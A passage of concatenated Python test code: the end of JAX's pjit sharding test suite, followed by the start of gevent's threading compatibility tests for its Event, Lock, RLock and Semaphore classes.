in_axis_resources=P('x'),
out_axis_resources=P('x'),
donate_argnums=0)
def f(x, y):
return x + y
shard = pjit(lambda x: x, in_axis_resources=P('x'),
out_axis_resources=P('x'))
x = shard(jnp.ones((2, 5)) * 4)
y = shard(jnp.ones((2, 5)) * 2)
expected = x + y
self.assertAllClose(f(x, y), expected)
self.assertNotDeleted(y)
self.assertDeleted(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraint(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
y = x + 1
y = with_sharding_constraint(y, P('x', 'y'))
return y * 2
shape = (8, 8)
x = np.arange(prod(shape)).reshape(shape)
expected = (x + 1) * 2
actual = f(x)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
hlo = jax.xla_computation(f)(np.ones(shape))
# Annotation from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraintPyTree(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
x = x.copy()
x[0]["a"] *= 2
return x
shape = (8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{"a": v, "b": v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]["a"] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]["a"].device_buffers, 2)
hlo = jax.xla_computation(f)(x)
# Annotations from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
def testCaching(self):
def f(x):
assert should_be_tracing
return jnp.sin(x) * 2
x = np.arange(16).reshape(4, 4)
devices = np.array(list(jax.local_devices())[:4])
if devices.size < 4:
raise SkipTest("Test requires 4 devices")
devices = devices.reshape((2, 2))
with mesh(devices, ('x', 'y')):
should_be_tracing = True
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
# Re-create the mesh to make sure that has no influence on caching
with mesh(devices, ('x', 'y')):
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testNested(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
x = jnp.arange(16).reshape((4, 4))
y = g(x)
self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
self.assertTrue(hasattr(y, "sharding_spec"))
@jtu.with_mesh([('x', 2), ('y', 1)])
def testJVP(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(x + 2), in_axis_resources=P('x', None), out_axis_resources=None)
jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)),),
order=2, modes=["fwd"], eps=1)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testEvalJaxpr(self):
x, y = jnp.arange(4), jnp.arange(5)
f = pjit(lambda x, y: x.sum() + jnp.sin(y),
in_axis_resources=(P('x'), P('y')),
out_axis_resources=P('y'))
f_jaxpr = jax.make_jaxpr(f)(x, y)
f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
r, = f_eval(x, y)
self.assertAllClose(r, x.sum() + jnp.sin(y))
@jtu.with_mesh([('x', 2)])
def testNonArrayArg(self):
self.assertEqual(pjit(lambda x: x + 2,
in_axis_resources=None,
out_axis_resources=None)(1), 3)
@jtu.with_mesh([('x', 2)])
def testNonHashableAxisResources(self):
x = jnp.arange(4)
y = pjit(lambda x: {'b': x['a'] + 2},
in_axis_resources=({'a': P('x')},),
out_axis_resources={'b': P('x')})({'a': x})
self.assertAllClose(y, {'b': x + 2})
@jtu.with_mesh([('x', 2)])
def testGradOfConstraint(self):
# Make sure that we can compute grads through sharding constraints
h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
f = pjit(lambda x: jax.grad(h)(x),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(8, dtype=jnp.float32)
self.assertAllClose(f(x), jnp.cos(x))
@jtu.with_mesh([('x', 2)])
def testNoopPartitionSpecs(self):
noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
x = jnp.arange(8).reshape((2, 2, 2))
for spec in noops:
y = pjit(lambda x: x * 2, in_axis_resources=spec, out_axis_resources=spec)(x)
self.assertAllClose(y, x * 2)
@jtu.with_mesh([('x', 2)])
def testVmapModifiesAxisResources(self):
h = pjit(lambda x, y: (x + y, x, y), in_axis_resources=P('x'), out_axis_resources=None)
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(h, in_axes=(None, 0)))(x, y).jaxpr
eqn = jaxpr.eqns[0]
self.assertIs(eqn.primitive, pjit_p)
x_sync, y_sync = (spec.sync for spec in eqn.params['in_axis_resources'])
self.assertEqual(x_sync, SpecSync.IN_SYNC)
self.assertEqual(y_sync, SpecSync.DIM_PERMUTE)
x_sync, y_sync, z_sync = (spec.sync for spec in eqn.params['out_axis_resources'])
self.assertEqual(x_sync, SpecSync.DIM_PERMUTE)
self.assertEqual(y_sync, SpecSync.IN_SYNC)
self.assertEqual(z_sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2)])
def testVMap(self):
f = pjit(lambda x, y: (x + y, x), in_axis_resources=P('x'), out_axis_resources=P('x'))
x = jnp.arange(4)
y = jnp.arange(5*4).reshape((5, 4))
z, w = jax.vmap(f, in_axes=(None, 0), out_axes=(0, None))(x, y)
self.assertAllClose(z, x + y)
self.assertAllClose(w, x)
self.assertEqual(z.sharding_spec.sharding, (pxla.NoSharding(), pxla.Chunked([2])))
self.assertEqual(w.sharding_spec.sharding, (pxla.Chunked([2]),))
@jtu.with_mesh([('x', 2)])
def testVMapShardingConstraint(self):
f = pjit(lambda x: with_sharding_constraint(x, P('x')),
in_axis_resources=P(), out_axis_resources=P('x'))
x = jnp.arange(5*4).reshape((5, 4))
jaxpr = jax.make_jaxpr(jax.vmap(f))(x)
pjit_eqn, = jaxpr.eqns
constraint_eqn, = pjit_eqn.params['jaxpr'].eqns
self.assertEqual(constraint_eqn.params['axis_resources'].partitions, ((), ('x',)))
self.assertEqual(constraint_eqn.params['axis_resources'].sync, SpecSync.DIM_PERMUTE)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingInXMap(self):
h = pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)
f = xmap(lambda x: h(x * 2), in_axes=['i', ...], out_axes=['i', ...],
axis_resources={'i': 'y'})
x = jnp.arange(16).reshape((4, 4))
self.assertIn(pjit_p, xla.call_translations)
rule = xla.call_translations[pjit_p]
test_rule_called = False
def _test_rule(*args, **kwargs):
nonlocal test_rule_called
test_rule_called = True
in_axis_resources = kwargs['in_axis_resources']
self.assertEqual(len(in_axis_resources), 1)
self.assertIn(('y',), in_axis_resources[0].partitions)
return rule(*args, **kwargs)
try:
xla.call_translations[pjit_p] = _test_rule
f(x)
self.assertTrue(test_rule_called)
finally:
xla.call_translations[pjit_p] = rule
def testInfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f_for_jit(x):
token = lax.create_token(x)
(y,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(z,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
(w,), token = lax.infeed(
token, shape=(jax.ShapedArray(x.shape, np.float32),))
return x + y + z + w
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
y = x * 2.
z = x * 3.
w = x * 4.
# Transfer data to infeed before executing the function. For GPUs, the
# execution of the compiled function is blocking, so transferring data
# to infeed before executing ensures that the execution does not deadlock
# waiting for the infeed data.
logging.info('Transfering to infeed for the jit call')
d = devices[0]
d.transfer_to_infeed((y,))
d.transfer_to_infeed((z,))
d.transfer_to_infeed((w,))
# JIT
logging.info('Making jit call')
res0 = jax.jit(f_for_jit)(x)
self.assertAllClose(res0, x + y + z + w, check_dtypes=True)
# PJIT
def f_for_pjit(x):
token = lax.create_token(x)
# A replicated infeed
(y,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(None,))
# An infeed sharded on first axis
(z,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(nr_devices, 1),))
# An infeed sharded on second axis
(w,), token = lax.infeed(
token,
shape=(jax.ShapedArray(x.shape, np.float32),),
partitions=(P(1, nr_devices),))
return x + y + z + w
logging.info('Transfering to infeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array to all devices for replicated.
d.transfer_to_infeed((y,))
# For sharded infeed, transfer only the needed slices to each device.
d.transfer_to_infeed((z[3 * didx:3 * didx + 3, :]))
d.transfer_to_infeed((w[:, 5 * didx:5 * didx + 5],))
with mesh(devices, ['d']):
logging.info('Making pjit call')
res = pjit(
f_for_pjit, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(
x)
self.assertAllClose(res0, res, check_dtypes=True)
def testOutfeed(self):
devices = np.array(jax.local_devices())
nr_devices = len(devices)
shape = (nr_devices * 3, nr_devices * 5)
def f(x):
token = lax.create_token(x)
token = lax.outfeed(token, x, partitions=(None,))
token = lax.outfeed(token, x, partitions=(P(nr_devices, 1),))
token = lax.outfeed(token, x, partitions=(P(1, nr_devices),))
return x
x = np.arange(np.prod(shape), dtype=np.float32).reshape(shape)
def dispatch():
with mesh(devices, ['d']):
logging.info('Making pjit call')
pjit(f, in_axis_resources=(P('d'),), out_axis_resources=P('d'))(x)
execution = threading.Thread(target=dispatch)
execution.start()
def check_outfeed(d, x):
y, = d.transfer_from_outfeed(
xla_client.shape_from_pyval((x,)).with_major_to_minor_layout_if_absent())
self.assertAllClose(x, y, check_dtypes=True)
logging.info('Transfering from outfeed for the pjit call')
for didx, d in enumerate(devices):
# Transfer the whole array from all devices for replicated.
check_outfeed(d, x)
# For sharded outfeed, the results are sliced.
check_outfeed(d, x[3 * didx:3 * didx + 3, :])
check_outfeed(d, x[:, 5 * didx:5 * didx + 5])
execution.join()
@curry
def check_1d_2d_mesh(f, set_mesh):
return parameterized.named_parameters(
{"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
for name, mesh, resources in (
("2", (("x", 2),), "x"),
("2x1", (("x", 2), ("y", 1)), ("x", "y")),
("2x2", (("x", 2), ("y", 2)), ("x", "y")),
))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
def spec_regex(s):
return str(s).replace(r"(", r"\(").replace(r")", r"\)")
class PJitErrorTest(jtu.JaxTestCase):
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleArgs(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleOuts(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources, None)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r".*"
r"implies that the size of its dimension 0 should be "
r"divisible by " + mesh_size + r", but it is equal to 3"):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=P(resources, None))(x)
@check_1d_2d_mesh(set_mesh=True)
def testNonDivisibleConstraint(self, mesh, resources):
x = jnp.ones((3, 2))
spec = P(resources,)
mesh_size = str(np.prod([dim[1] for dim in mesh], dtype=np.int64))
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r".*implies that the size of "
r"its dimension 0 should be divisible by " + mesh_size +
r", but it is equal to 3"):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesArgs(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit arguments.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesOuts(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of pjit outputs.*" + spec_regex(spec) + r", "
r"but resource axis x is undefined."):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@check_1d_2d_mesh(set_mesh=False)
@jtu.with_mesh([('z', 1)])
def testUndefinedResourcesConstraint(self, mesh, resources):
x = jnp.ones((2, 2))
spec = P(resources,)
with self.assertRaisesRegex(ValueError,
r"One of with_sharding_constraint arguments"
r".*" + spec_regex(spec) + r", but resource axis "
r"x is undefined."):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowArgs(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit arguments.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowOuts(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of pjit outputs.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 0")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x.sum(), in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRankTooLowConstraint(self):
x = jnp.arange(2)
spec = P('x', 'y')
error = (r"One of with_sharding_constraint arguments " +
r"was given.*" + spec_regex(spec) + r", which implies "
r"that it has a rank of at least 2, but it is 1")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: with_sharding_constraint(x, spec),
in_axis_resources=None, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedInResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single in_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=spec, out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testRepeatedOutResources(self):
x = jnp.arange(2)
for spec in [P('x', 'x'), P('x', ('y', 'x'))]:
error = (r"A single out_axis_resources specification can map every mesh "
r"axis to at most one positional dimension, but " +
spec_regex(spec) + " has duplicate entries for `x`")
with self.assertRaisesRegex(ValueError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=spec)(x)
@jtu.with_mesh([('x', 2)])
def testInputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=spec, out_axis_resources=None),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testOutputShardsXMapAxis(self):
spec = P('x')
f = xmap(pjit(lambda x: x + 2, in_axis_resources=None, out_axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"pjit output has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testConstraintShardsXMapAxis(self):
spec = P('x')
f = xmap(lambda x: with_sharding_constraint(x, axis_resources=spec),
in_axes=['i', ...], out_axes=['i', ...], axis_resources={'i': 'x'})
x = jnp.arange(4).reshape((2, 2))
error = (r"with_sharding_constraint input has an axis resources specification of " +
spec_regex(spec) + r" that uses one or more mesh axes already used by "
r"xmap to partition a named axis appearing in its named_shape \(both "
r"use mesh axes `x`\)")
with self.assertRaisesRegex(JAXTypeError, error):
f(x)
@jtu.with_mesh([('x', 2)])
def testCatchesInnerXMapErrors(self):
f = pjit(xmap(lambda x, y: x, in_axes=(['i'], ['j']), out_axes=['i', 'j'],
axis_resources={'i': 'x', 'j': 'x'}),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(4)
with self.assertRaises(JAXTypeError):
f(x, x)
def testEmptyMesh(self):
error = (r"pjit requires a non-empty mesh! Are you sure that it's defined "
r"at the call site?")
with self.assertRaisesRegex(RuntimeError, error):
pjit(lambda x: x, in_axis_resources=None, out_axis_resources=None)(jnp.arange(4))
@jtu.with_mesh([('x', 2), ('y', 2)])
def testLinearizeNotImplemented(self):
# pending https://github.com/google/jax/pull/6876
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
with self.assertRaisesRegex(NotImplementedError, "6876"):
jax.linearize(f, x, y)
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
|
test_threading_2.py
|
# testing gevent's Event, Lock, RLock, Semaphore, BoundedSemaphore with standard test_threading
from __future__ import with_statement
setup_ = '''from gevent import monkey; monkey.patch_all()
from gevent.event import Event
from gevent.lock import RLock, Semaphore, BoundedSemaphore
from gevent.thread import allocate_lock as Lock
import threading
threading.Event = Event
threading.Lock = Lock
threading.RLock = RLock
threading.Semaphore = Semaphore
threading.BoundedSemaphore = BoundedSemaphore
if not hasattr(threading, 'current_thread'):
threading.current_thread = threading.currentThread
if not hasattr(threading.Thread, 'name'):
threading.Thread.name = property(lambda self: self.getName())
if not hasattr(threading.Thread, 'is_alive'):
threading.Thread.is_alive = threading.Thread.isAlive
if not hasattr(threading.Thread, 'daemon'):
threading.Thread.daemon = property(threading.Thread.isDaemon, threading.Thread.setDaemon)
if not hasattr(threading._Condition, 'notify_all'):
threading._Condition.notify_all = threading._Condition.notifyAll
'''
exec setup_
setup_3 = '\n'.join(' %s' % line for line in setup_.split('\n'))
setup_4 = '\n'.join(' %s' % line for line in setup_.split('\n'))
setup_5 = '\n'.join(' %s' % line for line in setup_.split('\n'))
import test.test_support
from test.test_support import verbose
import random
import re
import sys
import threading
import thread
import time
import unittest
import weakref
import lock_tests
# A trivial mutable counter.
class Counter(object):
def __init__(self):
self.value = 0
def inc(self):
self.value += 1
def dec(self):
self.value -= 1
def get(self):
return self.value
class TestThread(threading.Thread):
def __init__(self, name, testcase, sema, mutex, nrunning):
threading.Thread.__init__(self, name=name)
self.testcase = testcase
self.sema = sema
self.mutex = mutex
self.nrunning = nrunning
def run(self):
delay = random.random() / 10000.0
if verbose:
print 'task %s will run for %.1f usec' % (
self.name, delay * 1e6)
with self.sema:
with self.mutex:
self.nrunning.inc()
if verbose:
print self.nrunning.get(), 'tasks are running'
self.testcase.assert_(self.nrunning.get() <= 3)
time.sleep(delay)
if verbose:
print 'task', self.name, 'done'
with self.mutex:
self.nrunning.dec()
self.testcase.assert_(self.nrunning.get() >= 0)
if verbose:
print '%s is finished. %d tasks are running' % (
self.name, self.nrunning.get())
class ThreadTests(unittest.TestCase):
# Create a bunch of threads, let each do some work, wait until all are
# done.
def test_various_ops(self):
# This takes about n/3 seconds to run (about n/3 clumps of tasks,
# times about 1 second per clump).
NUMTASKS = 10
# no more than 3 of the 10 can run at once
sema = threading.BoundedSemaphore(value=3)
mutex = threading.RLock()
numrunning = Counter()
threads = []
for i in range(NUMTASKS):
t = TestThread("<thread %d>" % i, self, sema, mutex, numrunning)
threads.append(t)
if hasattr(t, 'ident'):
self.failUnlessEqual(t.ident, None)
self.assert_(re.match('<TestThread\(.*, initial\)>', repr(t)))
t.start()
if verbose:
print 'waiting for all tasks to complete'
for t in threads:
t.join(NUMTASKS)
self.assert_(not t.is_alive())
if hasattr(t, 'ident'):
self.failIfEqual(t.ident, 0)
self.assertFalse(t.ident is None)
self.assert_(re.match('<TestThread\(.*, \w+ -?\d+\)>', repr(t)))
if verbose:
print 'all tasks done'
self.assertEqual(numrunning.get(), 0)
if sys.version_info[:2] > (2, 5):
def test_ident_of_no_threading_threads(self):
# The ident still must work for the main thread and dummy threads.
self.assertFalse(threading.currentThread().ident is None)
def f():
ident.append(threading.currentThread().ident)
done.set()
done = threading.Event()
ident = []
thread.start_new_thread(f, ())
done.wait()
self.assertFalse(ident[0] is None)
# Kill the "immortal" _DummyThread
del threading._active[ident[0]]
# run with a small(ish) thread stack size (256kB)
def test_various_ops_small_stack(self):
if verbose:
print 'with 256kB thread stack size...'
try:
threading.stack_size(262144)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
# run with a large thread stack size (1MB)
def test_various_ops_large_stack(self):
if verbose:
print 'with 1MB thread stack size...'
try:
threading.stack_size(0x100000)
except thread.error:
if verbose:
print 'platform does not support changing thread stack size'
return
self.test_various_ops()
threading.stack_size(0)
def test_foreign_thread(self):
# Check that a "foreign" thread can use the threading module.
def f(mutex):
# Calling current_thread() forces an entry for the foreign
# thread to get made in the threading._active map.
threading.current_thread()
mutex.release()
mutex = threading.Lock()
mutex.acquire()
tid = thread.start_new_thread(f, (mutex,))
# Wait for the thread to finish.
mutex.acquire()
self.assert_(tid in threading._active)
self.assert_(isinstance(threading._active[tid],
threading._DummyThread))
del threading._active[tid]
# in gevent, we actually clean up threading._active, but it's not happended there yet
# PyThreadState_SetAsyncExc() is a CPython-only gimmick, not (currently)
# exposed at the Python level. This test relies on ctypes to get at it.
def SKIP_test_PyThreadState_SetAsyncExc(self):
try:
import ctypes
except ImportError:
if verbose:
print "test_PyThreadState_SetAsyncExc can't import ctypes"
return # can't do anything
set_async_exc = ctypes.pythonapi.PyThreadState_SetAsyncExc
class AsyncExc(Exception):
pass
exception = ctypes.py_object(AsyncExc)
# `worker_started` is set by the thread when it's inside a try/except
# block waiting to catch the asynchronously set AsyncExc exception.
# `worker_saw_exception` is set by the thread upon catching that
# exception.
worker_started = threading.Event()
worker_saw_exception = threading.Event()
class Worker(threading.Thread):
def run(self):
self.id = thread.get_ident()
self.finished = False
try:
while True:
worker_started.set()
time.sleep(0.1)
except AsyncExc:
self.finished = True
worker_saw_exception.set()
t = Worker()
t.daemon = True # so if this fails, we don't hang Python at shutdown
t.start()
if verbose:
print " started worker thread"
# Try a thread id that doesn't make sense.
if verbose:
print " trying nonsensical thread id"
result = set_async_exc(ctypes.c_long(-1), exception)
self.assertEqual(result, 0) # no thread states modified
# Now raise an exception in the worker thread.
if verbose:
print " waiting for worker thread to get started"
worker_started.wait()
if verbose:
print " verifying worker hasn't exited"
self.assert_(not t.finished)
if verbose:
print " attempting to raise asynch exception in worker"
result = set_async_exc(ctypes.c_long(t.id), exception)
self.assertEqual(result, 1) # one thread state modified
if verbose:
print " waiting for worker to say it caught the exception"
worker_saw_exception.wait(timeout=10)
self.assert_(t.finished)
if verbose:
print " all OK -- joining worker"
if t.finished:
t.join()
# else the thread is still running, and we have no way to kill it
if sys.version_info[:2] > (2, 5):
def test_limbo_cleanup(self):
# Issue 7481: Failure to start thread should cleanup the limbo map.
def fail_new_thread(*args):
raise thread.error()
_start_new_thread = threading._start_new_thread
threading._start_new_thread = fail_new_thread
try:
t = threading.Thread(target=lambda: None)
self.assertRaises(thread.error, t.start)
self.assertFalse(
t in threading._limbo,
"Failed to cleanup _limbo map on failure of Thread.start().")
finally:
threading._start_new_thread = _start_new_thread
if sys.version_info[:2] > (2, 5):
def test_finalize_runnning_thread(self):
# Issue 1402: the PyGILState_Ensure / _Release functions may be called
# very late on python exit: on deallocation of a running thread for
# example.
try:
import ctypes
except ImportError:
if verbose:
print("test_finalize_with_runnning_thread can't import ctypes")
return # can't do anything
import subprocess
rc = subprocess.call([sys.executable, "-c", """if 1:
%s
import ctypes, sys, time, thread
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
# Module globals are cleared before __del__ is run
# So we save the functions in class dict
class C:
ensure = ctypes.pythonapi.PyGILState_Ensure
release = ctypes.pythonapi.PyGILState_Release
def __del__(self):
state = self.ensure()
self.release(state)
def waitingThread():
x = C()
ready.release()
time.sleep(100)
thread.start_new_thread(waitingThread, ())
ready.acquire() # Be sure the other thread is waiting.
sys.exit(42)
""" % setup_4])
self.assertEqual(rc, 42)
if sys.version_info[:2] > (2, 5):
def test_join_nondaemon_on_shutdown(self):
# Issue 1722344
# Raising SystemExit skipped threading._shutdown
import subprocess
p = subprocess.Popen([sys.executable, "-c", """if 1:
%s
import threading
from time import sleep
def child():
sleep(1)
# As a non-daemon thread we SHOULD wake up and nothing
# should be torn down yet
print "Woke up, sleep function is:", sleep
threading.Thread(target=child).start()
raise SystemExit
""" % setup_5],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
stdout = stdout.strip()
assert re.match('^Woke up, sleep function is: <.*?sleep.*?>$', stdout), repr(stdout)
stderr = re.sub(r"^\[\d+ refs\]", "", stderr, re.MULTILINE).strip()
self.assertEqual(stderr, "")
def test_enumerate_after_join(self):
# Try hard to trigger #1703448: a thread is still returned in
# threading.enumerate() after it has been join()ed.
enum = threading.enumerate
old_interval = sys.getcheckinterval()
try:
for i in xrange(1, 100):
# Try a couple times at each thread-switching interval
# to get more interleavings.
sys.setcheckinterval(i // 5)
t = threading.Thread(target=lambda: None)
t.start()
t.join()
l = enum()
self.assertFalse(t in l,
"#1703448 triggered after %d trials: %s" % (i, l))
finally:
sys.setcheckinterval(old_interval)
if sys.version_info[:2] > (2, 5):
def test_no_refcycle_through_target(self):
class RunSelfFunction(object):
def __init__(self, should_raise):
# The links in this refcycle from Thread back to self
# should be cleaned up when the thread completes.
self.should_raise = should_raise
self.thread = threading.Thread(target=self._run,
args=(self,),
kwargs={'yet_another': self})
self.thread.start()
def _run(self, other_ref, yet_another):
if self.should_raise:
raise SystemExit
cyclic_object = RunSelfFunction(should_raise=False)
weak_cyclic_object = weakref.ref(cyclic_object)
cyclic_object.thread.join()
del cyclic_object
self.assertEquals(None, weak_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_cyclic_object())))
raising_cyclic_object = RunSelfFunction(should_raise=True)
weak_raising_cyclic_object = weakref.ref(raising_cyclic_object)
raising_cyclic_object.thread.join()
del raising_cyclic_object
self.assertEquals(None, weak_raising_cyclic_object(),
msg=('%d references still around' %
sys.getrefcount(weak_raising_cyclic_object())))
class ThreadJoinOnShutdown(unittest.TestCase):
def _run_and_join(self, script):
script = """if 1:
%s
import sys, os, time, threading
# a thread, which waits for the main program to terminate
def joiningfunc(mainthread):
mainthread.join()
print 'end of thread'
\n""" % setup_3 + script
import subprocess
p = subprocess.Popen([sys.executable, "-c", script], stdout=subprocess.PIPE)
rc = p.wait()
data = p.stdout.read().replace('\r', '')
self.assertEqual(data, "end of main\nend of thread\n")
self.failIf(rc == 2, "interpreter was blocked")
self.failUnless(rc == 0, "Unexpected error")
def test_1_join_on_shutdown(self):
# The usual case: on exit, wait for a non-daemon thread
script = """if 1:
import os
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
time.sleep(0.1)
print 'end of main'
"""
self._run_and_join(script)
def test_2_join_in_forked_process(self):
# Like the test above, but from a forked interpreter
import os
if not hasattr(os, 'fork'):
return
script = """if 1:
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
sys.exit(0)
t = threading.Thread(target=joiningfunc,
args=(threading.current_thread(),))
t.start()
print 'end of main'
"""
self._run_and_join(script)
def test_3_join_in_forked_from_thread(self):
# Like the test above, but fork() was called from a worker thread
# In the forked process, the main Thread object must be marked as stopped.
import os
if not hasattr(os, 'fork'):
return
# Skip platforms with known problems forking from a worker thread.
# See http://bugs.python.org/issue3863.
# skip disable because I think the bug shouldn't apply to gevent -- denis
#if sys.platform in ('freebsd4', 'freebsd5', 'freebsd6', 'os2emx'):
# print >>sys.stderr, ('Skipping test_3_join_in_forked_from_thread'
# ' due to known OS bugs on'), sys.platform
# return
script = """if 1:
main_thread = threading.current_thread()
def worker():
childpid = os.fork()
if childpid != 0:
os.waitpid(childpid, 0)
